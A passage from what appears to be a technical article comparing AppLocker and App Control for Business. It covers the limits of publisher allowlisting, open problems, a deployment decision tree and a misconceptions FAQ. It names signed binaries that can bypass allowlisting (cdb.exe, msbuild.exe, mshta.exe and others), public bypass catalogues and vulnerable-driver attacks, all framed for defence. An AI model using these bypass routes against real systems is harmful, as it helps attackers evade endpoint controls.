&lt;code&gt;&amp;lt;Task&amp;gt;&lt;/code&gt; element and compile and execute the attached C# at runtime.&lt;/p&gt;
&lt;p&gt;This is the structural reason Microsoft publishes the Recommended Block Rules [@ms-appcontrol-bypass]. It is also the structural reason &lt;em&gt;&quot;allow all Microsoft-signed code&quot;&lt;/em&gt; is not a security policy -- it is a starting point.&lt;/p&gt;
&lt;p&gt;As established in §4 and §8, the bound is observed from both sides of the asymmetric arms race. External offensive research arrives at the &lt;em&gt;&quot;bored member of staff&quot;&lt;/em&gt; framing in the Windows 10 S analysis [@tiraniddo-dg-2017]; the Microsoft-employed authors of the canonical deployment baseline arrive at the &lt;em&gt;&quot;determined user with administrative rights&quot;&lt;/em&gt; framing in the AaronLocker README [@github-aaronlocker]. Two independent perspectives, the same ceiling stated in their own vocabularies. §12&apos;s contribution is not to re-quote either; it is to name the structural reason both arrive at the same place.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The publisher-gate ceiling is not an artefact of AppLocker&apos;s user-mode design or App Control&apos;s kernel-but-publisher design. The ceiling is a property of the &lt;em&gt;allowlist model&lt;/em&gt; whose allow signal is &lt;em&gt;&quot;this code is from a publisher I trust&quot;&lt;/em&gt; instead of &lt;em&gt;&quot;this code&apos;s runtime behaviour matches a trusted policy.&quot;&lt;/em&gt; Closing the ceiling would require policy-time content semantics, which no Microsoft-shipped mechanism provides today.&lt;/p&gt;
&lt;/blockquote&gt;

The folklore claim *&quot;a publisher-gate allowlist cannot evaluate side effects&quot;* does not have a published formal impossibility result in the cryptography or program-analysis literature. Rice&apos;s theorem supplies the necessary-condition argument used above -- any non-trivial behavioural property of programs is undecidable in the general case -- but a tighter result calibrated to publisher-gate allowlists would have to constrain the adversary model (for example, bound the candidate input space or restrict the binary&apos;s capability surface) before any positive decidability claim becomes possible. The application-control literature has not crossed that bar; this article does not either.
&lt;p&gt;If the ceiling is structural, what is the research community actively trying that &lt;em&gt;might&lt;/em&gt; push it upward? Microsoft is not the only player; the field has named open problems.&lt;/p&gt;
&lt;h2&gt;13. Open Problems and Active Research&lt;/h2&gt;
&lt;p&gt;Seven open problems the field has named but not closed. The most honest framing is: each one has a Microsoft partial-mitigation, none has a clean solution. Each is treated below with the problem statement, the empirical or architectural evidence, the current Microsoft (and where relevant, regulatory) mitigation, and the residual gap.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Continuous catch-up against new Microsoft-signed LOLBins.&lt;/strong&gt; Every new signed binary that takes a &lt;em&gt;&quot;run code from this file&quot;&lt;/em&gt; argument is a candidate addition to the &lt;em&gt;Recommended Block Rules&lt;/em&gt; [@ms-appcontrol-bypass]. The list is by construction monotonic and never complete. The empirical evidence is the lag between a LOLBin&apos;s public disclosure and its appearance on the Microsoft page, observable in Wayback Machine snapshots of the page. Three case studies bracket the lag range. Matt Graeber&apos;s August 2016 &lt;code&gt;cdb.exe&lt;/code&gt; shellcode-runner write-up [@exploit-monday-cdb-wayback] appears on the recommended-block-rules page in the months that followed. Jimmy Bayne&apos;s August 2019 &lt;code&gt;dotnet.exe&lt;/code&gt; write-up [@bohops-dotnet-awl] appears in a batch of additions roughly a year later. Peter Upfold&apos;s mid-2024 &lt;code&gt;webclnt.dll&lt;/code&gt;-via-Word issue [@upfold-webclnt-word-hang] was a hang, not a LOLBin, but the WebDAV / WebClient surface had appeared in the page revisions of the prior couple of years. The case studies suggest a working practitioner bound: lags between a public LOLBin disclosure and a corresponding entry on the Microsoft Recommended Block Rules page range from &lt;strong&gt;several months to over a year&lt;/strong&gt;, with longer tails for less load-bearing additions. A practitioner planning App Control deployments should not wait for the Microsoft page to catch up; merge community lists (LOLBAS [@lolbas-project], &lt;code&gt;bohops/UltimateWDACBypassList&lt;/code&gt; [@github-ultimatewdacbypass]) into your own enforcement explicitly. The open research question is whether a binary&apos;s &lt;em&gt;capability surface&lt;/em&gt; -- does it load arbitrary code? does it invoke a script host? -- can be inferred at scale, so the block list is &lt;em&gt;generated&lt;/em&gt; rather than &lt;em&gt;curated&lt;/em&gt;. Static analysis identifies some signals (a binary that imports &lt;code&gt;LoadLibrary&lt;/code&gt; and &lt;code&gt;GetProcAddress&lt;/code&gt; is at minimum suspect), but no Microsoft-shipped tool does this automatically across the signed-binary surface.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Signed-but-vulnerable drivers (BYOVD).&lt;/strong&gt; WHQL-signed drivers with kernel-mode vulnerabilities remain App Control&apos;s hardest residual class. Microsoft layers three distinct mitigations against this class, each at a different point in the load path. &lt;strong&gt;Load-time:&lt;/strong&gt; the &lt;em&gt;Vulnerable Driver Blocklist&lt;/em&gt; [@ms-driver-block-rules] is a policy fragment enforced by &lt;code&gt;ci.dll&lt;/code&gt; at every driver-load callback; the page itself admits the constraint plainly with &lt;em&gt;&quot;the vulnerable driver blocklist isn&apos;t guaranteed to block every driver found to have vulnerabilities.&quot;&lt;/em&gt; &lt;strong&gt;Write-time:&lt;/strong&gt; the Defender for Endpoint &lt;em&gt;&lt;a href=&quot;https://paragmali.com/blog/attack-surface-reduction-rules-the-quiet-layer-that-stopped-/&quot; rel=&quot;noopener&quot;&gt;Attack Surface Reduction&lt;/a&gt;&lt;/em&gt; rule &lt;em&gt;&quot;Block abuse of exploited vulnerable signed drivers&quot;&lt;/em&gt; [@ms-asr-rules-reference] intercepts an attempt to &lt;em&gt;write&lt;/em&gt; a known-bad signed driver to disk, blocking the deployment step rather than the load step. &lt;strong&gt;Post-load:&lt;/strong&gt; HVCI (memory integrity) [@ms-hvci] [@ms-support-memory-integrity] running in VTL1 ensures that a driver that does load -- whether through a gap in the blocklist or because the device is not enrolled in ASR -- cannot grant attacker-controlled code write access to kernel memory or unsigned execution capability. The three layers compose: ASR is the perimeter, the blocklist is the gate, HVCI is the post-load containment.&lt;/p&gt;

flowchart TD
    Attacker[&quot;Attacker with admin&lt;br /&gt;brings vulnerable signed driver&quot;]
    L1[&quot;Write-time ASR rule&lt;br /&gt;Block abuse of exploited&lt;br /&gt;vulnerable signed drivers&quot;]
    L2[&quot;Load-time Vulnerable&lt;br /&gt;Driver Blocklist&lt;br /&gt;(ci.dll, kernel)&quot;]
    L3[&quot;Post-load HVCI&lt;br /&gt;(VTL1, secure kernel)&quot;]
    Bypass[&quot;Residual: driver not on&lt;br /&gt;blocklist + ASR disabled&lt;br /&gt;+ HVCI off or vulnerability&lt;br /&gt;HVCI does not contain&quot;]
    Attacker --&amp;gt; L1
    L1 -- if not blocked --&amp;gt; L2
    L2 -- if not blocked --&amp;gt; L3
    L3 -- if not contained --&amp;gt; Bypass
&lt;p&gt;The Microsoft-recommended driver blocklist is published in two physical forms. The version baked into Windows ships through monthly Windows Update servicing. A separately downloadable XML at &lt;code&gt;aka.ms/VulnerableDriverBlockList&lt;/code&gt; is updated on its own cadence and is usually more complete than the version in-box on a given Patch Tuesday. The companion Driver Signing article in this pipeline covers KMCS, DSE, and the BYOVD class in depth; this section&apos;s BYOVD treatment is intentionally scoped to App Control&apos;s layered-mitigation role.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Cloud-evaluated allow decisions (ISG, SAC).&lt;/strong&gt; The decision authority for &lt;em&gt;&quot;is this binary allowed?&quot;&lt;/em&gt; is moving off-device to Microsoft&apos;s reputation services. Latency, offline-mode behaviour, and policy-transparency consequences are open practitioner concerns. &lt;em&gt;Known good&lt;/em&gt; reputation can lag for newly-signed binaries; &lt;em&gt;unknown&lt;/em&gt; defaults can disrupt legitimate workflows; the verdict itself is opaque to the organisation deploying the policy. The mechanism is documented [@ms-appcontrol-isg]; the operational implications continue to be discovered in production. The regulatory framing is the sharpest published constraint: the Australian Cyber Security Centre&apos;s &lt;em&gt;Implementing application control&lt;/em&gt; page [@acsc-essential-eight-appcontrol] is unambiguous that cloud-reputation-driven decisioning, by itself, &lt;strong&gt;does not qualify&lt;/strong&gt; as application control under the Essential Eight maturity model.&lt;/p&gt;

The ACSC lists &quot;checking the reputation of an application using a cloud-based service before it is executed&quot; among the practices under the heading &quot;What application control is not.&quot; -- Australian Cyber Security Centre, *Implementing application control* [@acsc-essential-eight-appcontrol]
&lt;p&gt;NIST SP 800-167 [@nist-sp-800-167] uses gentler language but arrives at the same operational conclusion: cloud-evaluated reputation is an &lt;em&gt;additive&lt;/em&gt; signal, not an &lt;em&gt;authoritative&lt;/em&gt; one. The practitioner consequence: an App Control policy that relies on ISG for its allow decisions in a regulated cardholder, classified, or critical-infrastructure environment will be flagged by both regimes. ISG and SAC remain useful additive signals; they do not substitute for an explicit allow policy authored and signed on-premises.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. AI-assisted policy generation.&lt;/strong&gt; AaronLocker [@github-aaronlocker] [@github-aaronlocker-script] is the canonical example of a heuristic generator -- it builds &lt;em&gt;&quot;audit&quot;&lt;/em&gt; and &lt;em&gt;&quot;enforce&quot;&lt;/em&gt; rule sets from observed telemetry, with explicit user-writeability pruning via Sysinternals &lt;code&gt;AccessChk&lt;/code&gt; [@ms-accesschk]. ML-assisted variants are an active third-party space. The article is honest about &lt;em&gt;not&lt;/em&gt; inventing specific Microsoft features that do not exist; the &lt;em&gt;&quot;ITL&quot;&lt;/em&gt; fabrication is the failure mode this avoids. The honest 2026 status of generative policy authoring inside Microsoft&apos;s own tooling is that Microsoft has shipped a Security-Copilot-powered &lt;em&gt;Policy Configuration Agent&lt;/em&gt; for Intune, scoped to the &lt;strong&gt;settings catalog&lt;/strong&gt; (device-configuration profiles), with no App-Control-specific surface.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Security-Copilot-powered Policy Configuration Agent in Microsoft Intune [@ms-intune-policy-configuration-agent] [@ms-intune-manage-policy-configuration-agent] assists administrators with &lt;strong&gt;settings catalog&lt;/strong&gt; policies. The agent&apos;s role requirement is the Intune &lt;em&gt;Policy and Profile manager&lt;/em&gt; RBAC role; the surface it operates on is device-configuration profiles, not App Control XML. The Intune Copilot agent overview [@ms-intune-copilot-overview] confirms the inventory of shipped agents and does not include an App-Control-authoring agent. The article does not assert that Microsoft has shipped end-to-end generative App Control policy authoring because, as of June 2026, Microsoft has not. The closest production workflow is the audit-mode-then-merge loop in &lt;code&gt;ConfigCI&lt;/code&gt;, and the closest &lt;em&gt;automatic&lt;/em&gt; allow-listing signal is Intune-Management-Extension-as-managed-installer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;5. Per-user without losing the kernel boundary.&lt;/strong&gt; App Control is whole-device; this is section 11&apos;s reason number one for why AppLocker still ships. No public Microsoft roadmap addresses per-user rules in App Control. Closing this would let App Control fully replace AppLocker in VDI / Citrix / terminal-server scenarios. The kernel evaluator has no per-user-token context by design, and adding it without compromising the boundary&apos;s tamper-resistance is a non-trivial design problem: per-user policy would have to be authored, signed, and refreshed at logon time without admitting an attacker who can forge a token into authoring their own per-user allow rule.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6. &lt;code&gt;.bat&lt;/code&gt; / &lt;code&gt;.cmd&lt;/code&gt; script enforcement.&lt;/strong&gt; AppLocker&apos;s Script collection covers them [@ms-applocker-rules]; App Control&apos;s script enforcement is host-cooperative [@ms-appcontrol-script-enforcement] and &lt;code&gt;cmd.exe&lt;/code&gt; is not an enlightened host. This is a documented gap [@ms-appcontrol-feature-availability] that has persisted since launch. Microsoft Learn is unusually direct about what the limitation actually means and what the recommended mitigation is.&lt;/p&gt;

App Control doesn&apos;t directly control code run via the Windows Command Processor (cmd.exe), including .bat/.cmd script files. However, anything that such a batch script tries to run is subject to App Control control. If you don&apos;t need to run cmd.exe, it&apos;s recommended to block it outright or allow it only by exception based on the calling process. -- Microsoft Learn, *Script enforcement with App Control* [@ms-appcontrol-script-enforcement]
&lt;p&gt;The architectural fix would require either &lt;code&gt;cmd.exe&lt;/code&gt; enlightenment (a substantial change to a binary with three decades of behavioural compatibility) or a kernel-side script-execution hook that does not exist today. Until then, the recommended mitigation is the one Microsoft itself names: deny &lt;code&gt;cmd.exe&lt;/code&gt; by default in the App Control policy and allow it by exception based on the calling process, or rely on AppLocker&apos;s Script collection on the same device in parallel for the &lt;code&gt;.bat&lt;/code&gt; / &lt;code&gt;.cmd&lt;/code&gt; workload.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;7. AppLocker&apos;s end state.&lt;/strong&gt; It is not deprecated [@ms-deprecated-features]; it is not actively developed [@ms-appcontrol-applocker-overview]; it continues to receive security fixes [@ms-kb-5044288]; and Microsoft Learn explicitly recommends the App Control / AppLocker pair as the substitute path for the now-deprecated Microsoft Defender Application Guard for Office [@ms-deprecated-features]. The article should not speculate about a deprecation date Microsoft has not announced. The open question is operational: when, if ever, will the practitioner reasons in section 11 (per-user, no-PKI, GPO ergonomics, installed base, threat-model fit) be obsolete? Until App Control gains per-user rules, the answer is &lt;em&gt;not soon&lt;/em&gt;. The lifecycle-quantification evidence is unambiguous on the direction of travel: the negative citation on the deprecated-features page, the comparative-recommendation positive characterisation in &lt;em&gt;App Control and AppLocker Overview&lt;/em&gt;, the KB5044288 Patch Tuesday servicing fix, and the &lt;em&gt;AppLocker recommended as MDAG-substitution&lt;/em&gt; finding from the deprecated-features page itself all point the same way.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Microsoft-org-hosted &lt;code&gt;WDAC-Toolkit&lt;/code&gt; repository [@github-wdac-toolkit] is the source repo for the App Control Wizard and the most reliable channel for App Control authoring-tool updates. The bohops &lt;code&gt;UltimateWDACBypassList&lt;/code&gt; [@github-ultimatewdacbypass] is the canonical community corpus that feeds the Recommended Block Rules attribution chain. The LOLBAS Project [@lolbas-project] is the cross-platform LOLBin catalogue. For BYOVD, the Microsoft Vulnerable Driver Blocklist page [@ms-driver-block-rules] is the running mitigation index, with the downloadable XML at &lt;code&gt;aka.ms/VulnerableDriverBlockList&lt;/code&gt; as the more-current sibling.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The structural ceiling is real and the research direction is open. Within the bounds that exist today, what should a 2026 practitioner &lt;em&gt;actually do&lt;/em&gt;? That is a decision tree, not an essay.&lt;/p&gt;
&lt;h2&gt;14. The Practitioner Decision Tree -- Picking and Deploying in 2026&lt;/h2&gt;
&lt;p&gt;Five questions, in order. Answer them and you have a deployment plan.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Do you need per-user rules and you do not have a code-signing PKI?&lt;/strong&gt; -&amp;gt; Deploy &lt;strong&gt;AppLocker&lt;/strong&gt;. Use AaronLocker [@github-aaronlocker] [@github-aaronlocker-script] as the deployment-tooling baseline. AaronLocker&apos;s &lt;code&gt;Create-Policies.ps1&lt;/code&gt; runs Sysinternals &lt;code&gt;AccessChk&lt;/code&gt; [@ms-accesschk] against &lt;code&gt;%ProgramFiles%&lt;/code&gt; and &lt;code&gt;%SystemRoot%&lt;/code&gt; to identify user-writable subdirectories and produce a thorough audit policy you tune from telemetry before flipping enforcement on.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Do you need a real security boundary against admin-equivalent attackers?&lt;/strong&gt; -&amp;gt; Deploy &lt;strong&gt;App Control for Business&lt;/strong&gt; with a &lt;strong&gt;signed policy&lt;/strong&gt; (signed by your organisation&apos;s PKI, not by the publisher of any individual application) and &lt;strong&gt;HVCI on&lt;/strong&gt;. Anything less and you do not have the configuration the MSRC servicing criteria treat as a security boundary.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Do you have a managed software distribution mechanism (Configuration Manager, Intune, Patch My PC, third-party tooling)?&lt;/strong&gt; -&amp;gt; App Control for Business with &lt;strong&gt;Managed Installer enabled&lt;/strong&gt; [@ms-appcontrol-managed-installer] [@ms-intune-app-control]. Tagging the deployment agent as a managed installer trust-propagates that agent&apos;s installs into the policy without requiring you to enumerate every binary it deploys.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Do you have a long tail of unmanaged user apps you cannot enumerate?&lt;/strong&gt; -&amp;gt; App Control for Business with &lt;strong&gt;ISG enabled&lt;/strong&gt; [@ms-appcontrol-isg]. But never as the &lt;em&gt;only&lt;/em&gt; authorisation path for business-critical apps. ISG is additive, not authoritative.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. Consumer or un-managed Windows 11 device?&lt;/strong&gt; -&amp;gt; &lt;strong&gt;Smart App Control&lt;/strong&gt;, if eligible [@ms-smart-app-control] [@ms-support-sac-faq]. Otherwise nothing.&lt;/p&gt;

flowchart TD
    Q1{&quot;Need per-user rules and no PKI?&quot;}
    Q2{&quot;Need admin-resistant boundary?&quot;}
    Q3{&quot;Have managed software distribution?&quot;}
    Q4{&quot;Have long tail of unmanaged apps?&quot;}
    Q5{&quot;Consumer or unmanaged device?&quot;}
    AL[&quot;AppLocker (with AaronLocker)&quot;]
    ACSigned[&quot;App Control for Business&lt;br /&gt;signed policy + HVCI&quot;]
    ACMI[&quot;Add Managed Installer rule&quot;]
    ACISG[&quot;Add ISG signal (additive)&quot;]
    SAC[&quot;Smart App Control&quot;]
    Nothing[&quot;No application control&quot;]
    Q1 -- yes --&amp;gt; AL
    Q1 -- no --&amp;gt; Q2
    Q2 -- yes --&amp;gt; ACSigned
    Q2 -- no --&amp;gt; Q5
    ACSigned --&amp;gt; Q3
    Q3 -- yes --&amp;gt; ACMI
    Q3 -- no --&amp;gt; Q4
    ACMI --&amp;gt; Q4
    Q4 -- yes --&amp;gt; ACISG
    Q4 -- no --&amp;gt; Done[&quot;Deployment complete&quot;]
    ACISG --&amp;gt; Done
    Q5 -- consumer --&amp;gt; SAC
    Q5 -- enterprise unmanaged --&amp;gt; Nothing
&lt;p&gt;&lt;strong&gt;The actual deployment knobs.&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scope&lt;/th&gt;
&lt;th&gt;GPO node&lt;/th&gt;
&lt;th&gt;PowerShell cmdlet inventory&lt;/th&gt;
&lt;th&gt;CSP / MDM path&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;AppLocker&lt;/td&gt;
&lt;td&gt;Computer Configuration -&amp;gt; Windows Settings -&amp;gt; Security Settings -&amp;gt; AppLocker&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Get-AppLockerPolicy&lt;/code&gt;, &lt;code&gt;Set-AppLockerPolicy&lt;/code&gt;, &lt;code&gt;Test-AppLockerPolicy&lt;/code&gt;, &lt;code&gt;New-AppLockerPolicy&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AppLocker CSP (maintenance only) [@ms-applicationcontrol-csp]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;App Control for Business&lt;/td&gt;
&lt;td&gt;Computer Configuration -&amp;gt; Administrative Templates -&amp;gt; System -&amp;gt; &lt;strong&gt;Device Guard&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;New-CIPolicy&lt;/code&gt;, &lt;code&gt;Merge-CIPolicy&lt;/code&gt;, &lt;code&gt;ConvertFrom-CIPolicy&lt;/code&gt;, &lt;code&gt;Set-CIPolicySetting&lt;/code&gt;, &lt;code&gt;Set-CIPolicyVersion&lt;/code&gt;, &lt;code&gt;Add-SignerRule&lt;/code&gt; (&lt;code&gt;ConfigCI&lt;/code&gt; module)&lt;/td&gt;
&lt;td&gt;ApplicationControl CSP [@ms-applicationcontrol-csp]; Intune endpoint security UX [@ms-intune-app-control]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;App Control Wizard&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Wraps &lt;code&gt;ConfigCI&lt;/code&gt; cmdlets [@ms-appcontrol-wizard]&lt;/td&gt;
&lt;td&gt;n/a (MSIX desktop app)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Server 2025 default policy&lt;/td&gt;
&lt;td&gt;OSConfig PowerShell cmdlets [@techcommunity-osconfig-server-2025]&lt;/td&gt;
&lt;td&gt;OSConfig&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The Intune deployment surface is the &lt;strong&gt;&lt;code&gt;ApplicationControl&lt;/code&gt; CSP&lt;/strong&gt; [@ms-applicationcontrol-csp], &lt;em&gt;not&lt;/em&gt; the older &lt;strong&gt;&lt;code&gt;AppLocker&lt;/code&gt; CSP&lt;/strong&gt;. Microsoft is explicit that new App Control feature work lands in &lt;code&gt;ApplicationControl&lt;/code&gt; only. The Intune endpoint-security UX path [@ms-intune-app-control] sits on top of that CSP.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The single most-skipped step in production App Control deployments is the merge of the Microsoft Recommended Block Rules [@ms-appcontrol-bypass] and the Vulnerable Driver Blocklist [@ms-driver-block-rules] into the active policy. Without them, &lt;em&gt;&quot;allow all Microsoft-signed code&quot;&lt;/em&gt; admits &lt;code&gt;cdb.exe&lt;/code&gt;, &lt;code&gt;csi.exe&lt;/code&gt;, &lt;code&gt;dnx.exe&lt;/code&gt;, &lt;code&gt;msbuild.exe&lt;/code&gt;, &lt;code&gt;mshta.exe&lt;/code&gt;, &lt;code&gt;dotnet.exe&lt;/code&gt;, and the rest of the LOLBin catalogue. With them, you have the configuration the MSRC servicing criteria treat as a security boundary. The merge is two &lt;code&gt;Merge-CIPolicy&lt;/code&gt; invocations and a redeploy.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The App Control for Business GPO node is still labelled &lt;em&gt;Device Guard&lt;/em&gt; in &lt;code&gt;gpedit.msc&lt;/code&gt;, even on Windows 11 24H2. Microsoft Learn calls this out explicitly [@ms-appcontrol-applocker-overview]: &lt;em&gt;&quot;The terms &apos;Device Guard&apos; and &apos;configurable code integrity&apos; are no longer used with App Control except when deploying policies through Group Policy.&quot;&lt;/em&gt; The naming confusion is the GPO tree&apos;s, not yours.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;{`
// Pseudocode walk of the App Control authoring path. The real cmdlets
// run in PowerShell on a Windows host with the ConfigCI module installed;
// this is the logic so you can mentally simulate the flow.&lt;/p&gt;
&lt;p&gt;const baseXml = NewCIPolicy({
  scanPath: &apos;C:\\Windows&apos;,
  level: &apos;SignedVersion&apos;,
  fallback: [&apos;Hash&apos;],
  filePath: &apos;BasePolicy.xml&apos;,
});&lt;/p&gt;
&lt;p&gt;const blockRulesXml = downloadAndImport(
  &apos;recommended-block-rules-policy&apos;,
);&lt;/p&gt;
&lt;p&gt;const driverBlockXml = downloadAndImport(
  &apos;vulnerable-driver-blocklist&apos;,
);&lt;/p&gt;
&lt;p&gt;const merged = MergeCIPolicy({
  inputs: [baseXml, blockRulesXml, driverBlockXml],
  output: &apos;Production.xml&apos;,
});&lt;/p&gt;
&lt;p&gt;SetCIPolicySetting({
  provider: &apos;SiPolicy&apos;,
  key: &apos;PolicyInfo&apos;,
  valueName: &apos;Information&apos;,
  value: &apos;Contoso Production Policy v1&apos;,
  policyPath: merged,
});&lt;/p&gt;
&lt;p&gt;const binaryCip = ConvertFromCIPolicy({
  inputXml: merged,
  binaryFilePath: &apos;Production.cip&apos;,
});&lt;/p&gt;
&lt;p&gt;// Sign Production.cip with the organisation&apos;s code-signing certificate
// before dropping it into:
//   %SystemRoot%\\System32\\CodeIntegrity\\CiPolicies\\Active\\
// then reboot to seal the trusted signer set.
console.log(&apos;Production policy authored and ready for signing&apos;);
`}&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Regulatory anchors.&lt;/strong&gt; NIST SP 800-167 [@nist-sp-800-167] on application allowlisting is the federal framing. The ACSC Essential Eight [@acsc-essential-eight-appcontrol] treats application control as one of eight baseline mitigations and is explicit that &lt;em&gt;&quot;the use of file names, package names or any other easily changed application attribute is not considered suitable as a method of application control&quot;&lt;/em&gt; -- a structural exclusion that maps cleanly onto Authenticode-signer and hash rules but rules out an AppLocker policy built primarily on path. PCI DSS v4.0.1 [@pci-document-library] requires comparable controls for cardholder environments. The article does not work through any of them in depth; the citations are here so a practitioner can find their own compliance map.The Wayback-preserved 2017 Device Guard policy deployment guide [@ms-deploy-ci-wayback] is the canonical historical reference for the pre-1709 era, before the WDAC rename. Practitioners maintaining older infrastructure occasionally need it.&lt;/p&gt;

The AppLocker MMC wizard does not create default rules automatically. If you enable enforcement on a collection with zero rules, the collection&apos;s *default behaviour* is to **deny everything that matches the collection**. An enforcing Executable collection with no rules blocks every `.exe` on the device, including the ones Windows needs to boot useful applications. The wizard surface has an *Automatically generate rules* button precisely to avoid this footgun; the AaronLocker authoring path bakes the default rules in from the start. If you have ever seen a Windows session that suddenly cannot launch anything after a GPO refresh, this is the most common cause.
&lt;p&gt;The decision tree is operational. The remaining job is to inoculate against the misconceptions the field has accumulated over twenty-five years. That is the FAQ.&lt;/p&gt;
&lt;h2&gt;15. FAQ -- Misconceptions and Corrections&lt;/h2&gt;
&lt;p&gt;The application-control literature has accumulated eight common misconceptions over twenty-five years. Each one is corrected below with the primary source that settles the question.&lt;/p&gt;

Not in the threat-modelling sense. Microsoft Learn states directly that AppLocker *&quot;helps to prevent end-users from running unapproved software on their computers, but doesn&apos;t meet the servicing criteria for being a security feature&quot;* [@ms-appcontrol-applocker-overview]. AppLocker is operational hygiene against non-admin users running unapproved binaries. An attacker who has reached administrator or `SYSTEM` can stop the `AppIDSvc` service and end enforcement [@ms-applocker-architecture]. If your threat model includes an admin-equivalent attacker, AppLocker is not the right control; App Control for Business with a signed policy and HVCI on is.

No. App Control for Business is the current name for what was called Windows Defender Application Control from 2017 to 2024, which was called Configurable Code Integrity under the Device Guard umbrella from 2015 to 2017. Same kernel CI code path, three brand eras [@ms-appcontrol-applocker-overview] [@ms-blog-introducing-wdac-2017] [@github-wdac-toolkit-issue-411]. The rename in 2024 with Windows 11 24H2 and Server 2025 is brand management; the cmdlets and the policy XML schema are unchanged.

No. You sign the policy with the **deploying organisation&apos;s** code-signing certificate -- typically an internal PKI leaf, with the private key on a hardware token or in a sealed vault [@ms-appcontrol-applocker-overview]. The application publisher&apos;s certificate is what the policy *evaluates against* at image-load time (signer rules in the policy reference publisher subjects). The two are entirely different roles. A common misreading is to assume that *&quot;signed policy&quot;* means *&quot;policy that allows signed apps&quot;* -- it does not. *Signed policy* means the `.cip` file itself carries a signature that prevents a `SYSTEM` attacker from removing or replacing it.

No. ISG is a reputation classifier, not a list. Microsoft Learn states verbatim [@ms-appcontrol-isg]: *&quot;The ISG isn&apos;t a &apos;list&apos; of apps. Rather, it uses the same vast security intelligence and machine learning analytics that power Microsoft Defender SmartScreen and Microsoft Defender Antivirus to help classify applications as having &apos;known good,&apos; &apos;known bad,&apos; or &apos;unknown&apos; reputation.&quot;* When an App Control policy is configured with ISG enabled, ISG&apos;s *known good* verdict acts as an additive allow signal alongside the policy&apos;s explicit signer / hash / path / Managed Installer rules.

**No such feature exists.** A search of Microsoft Learn produces zero results for *ITL* or *Intelligent Trusted List*; URLs cited by AI summaries return 404; and the definitions offered by AI summaries contradict each other. The closest real Microsoft features are the Intelligent Security Graph [@ms-appcontrol-isg], the Microsoft Recommended Block Rules [@ms-appcontrol-bypass], and Smart App Control [@ms-smart-app-control]. If you see *ITL* in a security blog or AI-generated summary, treat it as a fabrication and ignore it.

No. **AaronLocker** is Aaron Margosis&apos;s *deployment tool* [@github-aaronlocker]. It is a PowerShell-based generator that authors thorough audit and enforce policies for AppLocker and App Control. The canonical AppLocker *bypass* catalogue is Oddvar Moe&apos;s `UltimateAppLockerByPassList` [@github-ultimateapplockerbypass]. The canonical App Control bypass catalogue is Jimmy Bayne&apos;s `bohops/UltimateWDACBypassList` [@github-ultimatewdacbypass]. Microsoft&apos;s own bypass list is the *Applications that can bypass App Control* page [@ms-appcontrol-bypass]. Four different artefacts, four different roles.

The enforcement engine is approximately the same (both run inside `ci.dll`), but SAC is a categorically different product: unmanaged, all-or-nothing, ISG-gated, and capable of silently auto-disabling [@ms-smart-app-control]. SAC has no per-app policy authoring surface, no GPO, no Intune integration. Enterprise-managed devices keep SAC off [@ms-support-sac-faq]. And contrary to older blog posts, SAC can be re-enabled without a clean Windows install on current Windows versions: *&quot;Recent Windows updates allow Smart App Control to be re-enabled without requiring a clean installation&quot;* [@ms-support-sac-faq]. The vocabulary is *evaluation mode*, not *audit mode*.

No -- not in any sense Microsoft would recognise. As of February 2, 2026, AppLocker is not on the *Deprecated features in the Windows client* page [@ms-deprecated-features]. Microsoft Learn does say AppLocker *&quot;isn&apos;t getting new feature improvements&quot;* and that it *&quot;doesn&apos;t meet the servicing criteria for being a security feature&quot;* [@ms-appcontrol-applocker-overview], but it also says AppLocker *&quot;continues to receive security fixes&quot;* -- and the October 2024 KB5044288 cumulative update confirms that claim with a concrete AppLocker servicing fix [@ms-kb-5044288]. The defensible characterisation is *feature complete, not actively developed, continues to receive security fixes* -- not *deprecated*.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;applocker-vs-wdac-two-generations&quot; keyTerms={[
  { term: &quot;AppLocker&quot;, definition: &quot;Windows 7 / Server 2008 R2 era application-control feature; kernel minifilter (AppID.sys) defers verdict to user-mode AppIDSvc; classified as defense-in-depth, not a security feature.&quot; },
